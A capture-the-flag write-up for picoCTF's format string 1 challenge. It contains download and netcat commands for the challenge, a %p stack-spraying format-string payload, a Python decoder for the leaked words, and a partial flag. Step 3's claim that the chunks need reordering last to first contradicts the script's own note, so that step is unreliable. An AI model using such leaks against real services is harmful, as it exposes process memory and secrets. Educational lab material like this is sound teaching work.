Description
Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!
Setup
Netcat + CyberChef
Download the binary/source for local testing, then connect to the remote menu with netcat.
Have CyberChef (or another hex→ASCII tool) ready to decode the leaked pointers.
wget https://artifacts.picoctf.net/c_mimas/50/vuln && \
wget https://artifacts.picoctf.net/c_mimas/50/vuln.c && \
nc mimas.picoctf.net 57322
Solution
This builds on format string 0 by requiring you to leak stack data instead of just selecting menu items. Once you master stack leaks, advance to format string 2 to learn memory overwrites with pwntools.
- Step 1: Spray the stack. Send a payload of repeated %p separated by commas to dump many stack words at once.
  %p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
- Step 2: Filter the useful words. Among the outputs you'll see 0x7b4654436f636970 etc. These 0x-prefixed values are not real pointers but ASCII chunks of the flag, and they appear in reverse order: the stack is little-endian, so 0x7b4654436f636970 holds the bytes of "picoCTF{" back to front.
- Step 3: Decode and reorder. Copy the five flag words into CyberChef, apply From Hex then Reverse. Reordering the chunks (last to first) yields picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}.
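The decoding in Steps 2 and 3 can also be done in one pass with a short script instead of CyberChef. This is an added example, not part of the original writeup: the function names, the sample flag and the surrounding stack values are constructed for illustration, and it assumes 8-byte little-endian words as printed by %p on x86-64.

```python
import re
import struct

def words_to_bytes(leak: str) -> bytes:
    """Rebuild the raw stack bytes behind a comma-separated %p dump."""
    out = b""
    for token in leak.strip().split(","):
        token = token.strip()
        if token == "(nil)":                      # glibc prints NULL this way
            value = 0
        elif re.fullmatch(r"0x[0-9a-fA-F]{1,16}", token):
            value = int(token, 16)                # %p drops leading zeros
        else:
            continue                              # menu text, prompts, etc.
        # Little-endian: the lowest byte of the word comes first in memory,
        # so packing as "<Q" undoes the apparent reversal.
        out += struct.pack("<Q", value)
    return out

def extract_flag(leak: str, prefix: bytes = b"picoCTF{"):
    """Return the first printable prefix...} run in the leak, or None."""
    data = words_to_bytes(leak)
    m = re.search(re.escape(prefix) + rb"[ -~]*?\}", data)
    return m.group(0).decode("ascii") if m else None

def fake_leak(secret: bytes) -> str:
    """Constructed sample: show `secret` as a %p spray would print it."""
    padded = secret + b"\x00" * (-len(secret) % 8)
    flag_words = struct.unpack(f"<{len(padded) // 8}Q", padded)
    # Constructed filler values standing in for unrelated stack contents.
    words = [0x402118, 0, 0x7FFC0A1B2C30, *flag_words, 0x7]
    return ",".join("(nil)" if w == 0 else hex(w) for w in words)

# Constructed placeholder, not the challenge flag.
SAMPLE = b"picoCTF{c0nstruct3d_s4mple_n0t_r34l}"

if __name__ == "__main__":
    leak = fake_leak(SAMPLE)
    print(leak)
    print(extract_flag(leak))
```

Because each word is unpacked individually and kept in stack order, no separate chunk-reordering step is needed.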
Flag
picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}